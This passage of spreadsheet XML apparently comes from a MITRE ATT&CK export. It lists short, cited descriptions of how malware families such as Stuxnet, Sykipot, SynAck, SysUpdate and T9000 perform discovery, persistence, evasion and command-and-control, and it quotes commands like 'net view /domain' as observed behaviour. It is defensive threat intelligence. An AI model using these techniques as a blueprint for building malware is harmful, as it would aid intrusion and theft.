    <t>[Stuxnet](https://attack.mitre.org/software/S0603) reduces the integrity level of objects to allow write actions.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--b766ad99-7562-44ed-a5fa-26551e6d62db</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) can delete OLE Automation and SQL stored procedures used to store malicious payloads.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--726e2014-a0d6-4ed3-959b-2ad647884f5c</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) installs an RPC server for P2P communications.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--e3549420-15ec-4747-9988-7dfdbdb1e7d7</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--da63f54a-e6a4-414b-9d54-404b0a63d2f6</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) enumerates user accounts of the local host.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--b65d643e-ff0b-4cf1-8c3f-7d31f39f2efb</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) can create registry keys to load driver files.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--2f11e661-a5a0-4420-b97e-b080fc4fa441</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses the SetSecurityDescriptorDacl API to reduce object integrity levels.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--d70530d5-b733-4b5a-9589-9f6a16670ed2</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) enumerates the directories of a network resource.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--d25f8661-bb36-479b-b5ca-ff21abc656b8</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses encrypted configuration blocks and writes encrypted files to disk.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--544b4f94-a1b6-49cd-adf8-c0b6499e8acd</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) enumerates removable drives for infection.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--96640478-b6a5-40b6-8928-b1c0cc5ad3ef</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) searches the Registry for indicators of security programs.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--c88502ec-f0f7-4b86-865b-8dc0a21b9580</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) can propagate via peer-to-peer communication and updates using RPC.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--df3c4e4d-9766-4673-ab1f-2210ecc50764</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--5fccce48-b648-40e4-a58a-18f068189daf</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses a Windows rootkit to mask its binaries and other relevant files.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--7c85cd06-5b92-4b5d-acf5-fdd12a73b289</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) propagates to available network shares.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--c6c086b1-65b6-45ba-ba86-7ccd7f2849d3</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) used xp_cmdshell to store and execute SQL code.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--e8379082-d4fe-4bc9-8ba6-63299045eb73</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) schedules a network job to execute two minutes after host infection.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--dc19b319-1c17-45f0-9881-9bf2ac8a2611</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) enumerates the currently running processes related to a variety of security products.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--9e0d38b0-f7c6-432e-8f7d-470e07a6d303</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) calls LoadLibrary then executes exports from a DLL.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--261e7ed2-9252-40ea-9f06-abc45797c004</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--130f35b1-17d5-45bf-9000-2040adbcc56c</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</si>
  <si>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</si>
  <si>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relationship--73fa4b5d-e75f-4050-b7aa-d003b3a31bf3</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) collects system information including computer and domain names, OS version, and S7P paths.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--061cfa7a-df09-40cc-bed5-35407b425cb8</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) collects the IP address of a compromised system.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--02a353b7-7b15-4068-82eb-7385c1684021</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) collects the time and date of a system when it is infected.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--ce1c1257-f244-4844-8aa5-16992430f9ef</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) infects remote servers via network shares and by infecting WinCC database views with malicious code.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--e665a033-2893-43f5-ab5f-ba4c91636aba</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) extracts and writes driver files that match the times of other legitimate files.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--237283ca-5cae-48c3-9a5a-3dc17725cd5f</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) attempts to impersonate an anonymous token to enumerate bindings in the service control manager.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--3ee76373-418f-43af-adb5-3c0fcb7f080e</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses HTTP to communicate with a command and control server. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--81763def-b0ec-4938-832d-cffb382bb4a8</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) used WMI with an &lt;code&gt;explorer.exe&lt;/code&gt; token to execute on a remote share.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--29552a61-61fe-4265-9468-e53318bd388c</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses a driver registered as a boot start service as the main load-point.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--382e04c1-aa23-4e52-a254-06e45ca8edfd</t>
  </si>
  <si>
    <t>S0018</t>
  </si>
  <si>
    <t>Sykipot</t>
  </si>
  <si>
    <t>malware--6a0ef5d4-fc7c-4dda-85d7-592e4dbdc5d9</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) uses SSL for encrypting C2 communications.(Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>relationship--10c33088-630e-456d-ad0f-8a63be4d3946</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</si>
  <si>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</si>
  <si>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relationship--2eb985a1-e73e-4554-8638-2e6f27690ec0</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>relationship--df5bee66-b840-405e-b9d5-2e0ced2e6808</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) contains keylogging functionality to steal passwords.(Citation: Alienvault Sykipot DOD Smart Cards)</t>
  </si>
  <si>
    <t>relationship--7a30e6e7-ed64-47b1-b368-c1cec96d5fbf</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</si>
  <si>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</si>
  <si>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relationship--2b6da092-7380-4bd3-bd4c-f136a5b9b4cc</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may gather a list of running processes by running &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>relationship--4438ba64-0cd2-46e9-8a67-c685bf9b404c</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) has been known to establish persistence by adding programs to the Run Registry key.(Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>relationship--c1421d39-cb5d-4bac-a931-9c641066c0fd</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net view /domain&lt;/code&gt; to display hostnames of available systems on a network.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>relationship--7fe49f05-8f96-4fc2-bc5b-b2eea59efca3</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;ipconfig /all&lt;/code&gt; to gather system network configuration details.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>relationship--9b203f00-34db-475f-a28b-f5088d937f4e</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;netstat -ano&lt;/code&gt; to display active network connections.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>relationship--83ad6071-8874-49c9-98cd-0d493a8eeb07</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net start&lt;/code&gt; to display running services.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>relationship--09c10778-19ad-441a-8a75-a3cf1288f960</t>
  </si>
  <si>
    <t>S0242</t>
  </si>
  <si>
    <t>SynAck</t>
  </si>
  <si>
    <t>malware--04227b24-7817-4de1-9050-b7b1b57f5866</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) clears event logs.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>relationship--10bb3d29-fe7d-49a4-a03b-ba1f78993af8</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) encrypts the victims machine followed by asking the victim to pay a ransom. (Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>relationship--8c1c7c51-f9bf-4163-a01b-7d922a2d1a93</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) checks its directory location in an attempt to avoid launching in a sandbox.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>relationship--0dba319b-0d1e-4c73-8153-9ce13d27c98c</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) can manipulate Registry keys.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>relationship--109b2118-d714-41bb-a39d-b1fd1b755b55</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) parses the export tables of system DLLs to locate and call various Windows API functions.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>relationship--699e964d-b8c8-46fd-bd2d-9787433ab077</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>relationship--142ef662-460f-4082-8f76-f08dd312bc30</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates all running processes.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>relationship--da7fb67f-3cb2-498d-a832-f98622bc9ee2</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) abuses NTFS transactions to launch and conceal malicious processes.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>relationship--41ac0542-9215-466a-ba43-05bd8b9e330b</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates Registry keys associated with event logs.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>relationship--69c3aaaf-0922-4662-a8b3-026dc5ea0aae</t>
  </si>
  <si>
    <t>relationship--36b27959-d265-4fb6-b33b-3a1e74d43206</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>relationship--3e58118d-64b9-43ae-bfd8-cb3c8bf19556</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</si>
  <si>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</si>
  <si>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relationship--cfed60a3-c288-4c12-bfe2-2c0234a3cfa7</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) gathers user names from infected hosts.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>relationship--2fededb7-e713-495c-a317-919c037434a8</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates all running services.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>relationship--97a083ff-40ef-4e4c-9837-4ab1537a063c</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the group name of the logged-in user and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--2cfa6113-1995-494a-b767-61d3f371e0ea</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) uses an XOR 0x1 loop to encrypt its C2 domain.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--19c33297-1efd-4489-b09c-a4230ce194f4</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the computer name, OS versioning information, and OS install date and sends the information to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--550bf43e-53da-467e-affd-9f44ad668508</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the local IP address of the victim and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--bb2ba4b6-d96a-4d66-ac13-aa657108b363</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the account name of the logged-in user and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--fea6e347-95f5-4d97-8781-4cc15d6b5b0c</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) uses HTTP for C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--c80250a5-79c0-4a46-a0e3-49d6bcd574c6</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has been signed with stolen digital certificates.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--3c6fad21-d9e4-4e58-b8d1-ba573b2ec6d8</t>
  </si>
  <si>
    <t xml:space="preserve">[SysUpdate](https://attack.mitre.org/software/S0663) can load DLLs through vulnerable legitimate executables.(Citation: Trend Micro Iron Tiger April 2021)
</t>
  </si>
  <si>
    <t>relationship--c8434ee2-f60f-48c4-a2d5-2576257a8387</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has used DNS TXT requests as for its C2 communication.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--04ff77bc-6232-4950-8e9c-6f4dcc83ca9d</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can collect information and files from a compromised host.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--48d34942-8001-41d2-ba53-0457c3852541</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can deobfuscate packed binaries in memory.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--1387ec64-ba36-42cd-b659-c29e708d8281</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has exfiltrated data over its C2 channel.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--853e7b95-9edb-4260-b08d-3dd3b922cb73</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can delete its configuration file from the targeted system.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--a2ecfb8e-b12f-42be-af49-9df0dbf66c81</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can search files on a compromised host.(Citation: Trend Micro Iron Tiger April 2021)(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--5c0bb793-ced9-4b3c-80c2-af33e1fa6213</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can store its encoded configuration file within &lt;code&gt;Software\Classes\scConfig&lt;/code&gt; in either &lt;code&gt;HKEY_LOCAL_MACHINE&lt;/code&gt; or &lt;code&gt;HKEY_CURRENT_USER&lt;/code&gt;.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--596099b1-11a9-43c3-ae21-d5a31233e5c2</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has the ability to set file attributes to hidden.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--b4b6fec9-3f56-4571-9555-344cea28e667</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has the ability to download files to a compromised host.(Citation: Trend Micro Iron Tiger April 2021)(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--759ce6e8-da01-4cd6-9d03-9b0a1edde9be</t>
  </si>
  <si>
    <t xml:space="preserve">[SysUpdate](https://attack.mitre.org/software/S0663) can contact the DNS server operated by Google as part of its C2 establishment process.(Citation: Lunghi Iron Tiger Linux) </t>
  </si>
  <si>
    <t>relationship--63106a66-1408-4a15-b945-072f5e3ae2ff</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has named their unit configuration file similarly to other unit files residing in the same directory, `/usr/lib/systemd/system/`, to appear benign.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--829794bf-ad71-4f31-8e78-df712d751419</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can write its configuration file to &lt;code&gt;Software\Classes\scConfig&lt;/code&gt; in either &lt;code&gt;HKEY_LOCAL_MACHINE&lt;/code&gt; or &lt;code&gt;HKEY_CURRENT_USER&lt;/code&gt;.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--b01341a2-dacf-4780-acf9-3325f8597409</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can call the `GetNetworkParams` API as part of its C2 establishment process.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--e28c174a-33d6-4fef-989f-7c58d0fb770d</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can encrypt and encode its configuration file.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--8690ef38-ee7a-49ec-b723-0f7dceced233</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can collect information about running processes.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--29d1fe5a-4ea4-4fb2-8b64-afcceee45d10</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can use a Registry Run key to establish persistence.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--c9768a3e-1556-488e-8a9e-55389fd1752e</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has the ability to capture screenshots.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--9069440f-f2d0-4548-94a8-6759a31b1425</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can manage services and processes.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--e7fd3986-ae47-4301-9299-a3f8be437d03</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has been packed with VMProtect.(Citation: Trend Micro Iron Tiger April 2021)(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--dd2ef18a-1072-4f5b-a360-a01017b421e2</t>
  </si>
  <si>
    <t xml:space="preserve">[SysUpdate](https://attack.mitre.org/software/S0663) has used Base64 to encode its C2 traffic.(Citation: Lunghi Iron Tiger Linux) </t>
  </si>
  <si>
    <t>relationship--1b1a7abf-72bc-44fa-8f90-4321003f0553</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has used DES to encrypt all C2 communications.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--089ad94f-daa3-437d-931a-9fc2b782595c</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can collect a system's architecture, operating system version, hostname, and drive information.(Citation: Trend Micro Iron Tiger April 2021)(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--89d37095-2f31-42e9-b8f7-3abdd76d5f57</t>
  </si>
  <si>
    <t xml:space="preserve">[SysUpdate](https://attack.mitre.org/software/S0663) can collected the IP address and domain name of a compromised host.(Citation: Lunghi Iron Tiger Linux) </t>
  </si>
  <si>
    <t>relationship--da8b2bcf-c952-4076-8e45-b18572f49ae9</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can collect the username from a compromised host.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--25b8811b-3e73-40c7-b1fc-132eeb5a6f5e</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can collect a list of services on a victim machine.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--10bb2d06-6158-4cf2-bd35-0840a8e0a129</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</si>
  <si>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</si>
  <si>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relationship--9a0137e5-82d0-4419-961a-9b0eb47b2d79</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can use WMI for execution on a compromised host.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--ef41cf60-c60d-4c1f-aa2c-ee9cc73641f4</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can create a service to establish persistence.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--f837c70e-984e-4681-ab3a-0ad4ad1a512f</t>
  </si>
  <si>
    <t>[Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather information about the operating system.(Citation: TechNet Systeminfo)</t>
  </si>
  <si>
    <t>relationship--c088f23e-b741-453c-a710-01990dead853</t>
  </si>
  <si>
    <t>S0098</t>
  </si>
  <si>
    <t>T9000</t>
  </si>
  <si>
    <t>malware--876f6a77-fbc5-4e13-ab1a-5611986730a3</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</si>
  <si>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</si>
  <si>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relationship--3d16b34f-f58b-4469-a0ef-7585f88d6001</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) encrypts collected data using a single byte XOR key.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>relationship--bb11119c-c409-4615-8c3f-8491749f2d3b</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) uses the Skype API to record audio and video calls. It writes encrypted data to &lt;code&gt;%APPDATA%\Intel\Skype&lt;/code&gt;.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>relationship--842f8f4b-9d90-4533-850f-777f33ef8257</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) searches removable storage devices for files with a pre-defined list of file extensions (e.g. * .doc, *.ppt, *.xls, *.docx, *.pptx, *.xlsx). Any matching files are encrypted and written to a local user directory.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>relationship--11bc3d01-fc44-415c-b5a3-5576f5cb6057</t>
  </si>
  <si>
    <t>During the [T9000](https://attack.mitre.org/software/S0098) installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>relationship--677f32ad-2aa1-4fe3-8dab-73494891aa4a</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) searches through connected drives for removable storage devices.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>relationship--ea93ff11-939f-449a-a222-4273d9fc9f3c</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>relationship--dd89d8a2-257a-47f9-8b55-8011ca53007b</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) performs checks for various antivirus and security products during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>relationship--74e84133-f84a-469a-bfd7-1a514af2f15e</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the operating system build number and CPU Architecture (32-bit/64-bit) during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>relationship--487d67d7-b697-4de4-abde-decee8b17c44</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the MAC and IP addresses during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>relationship--0649f7fd-3aa1-4646-a7a4-2334088c6c74</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>relationship--a6150e37-2411-409f-82a0-e259d55d1166</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the system time during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>relationship--0d2a66c5-fb8e-4cbb-9526-579b5c9c881c</t>
  </si>
  <si>
    <t>relationship--e5a2a20c-1ef7-49a9-a9fa-2b89231793b8</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) has used &lt;code&gt;FileReadZipSend&lt;/code&gt; to compress a file and send to C2.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--1f066ba6-31e2-48d1-a7ac-27a20879287b</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;FileRecvWriteRand&lt;/code&gt; to append random bytes to the end of a file received from C2.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--0a4e5f93-6efa-4490-b7fb-21a47a15612b</t>
  </si>
  <si>
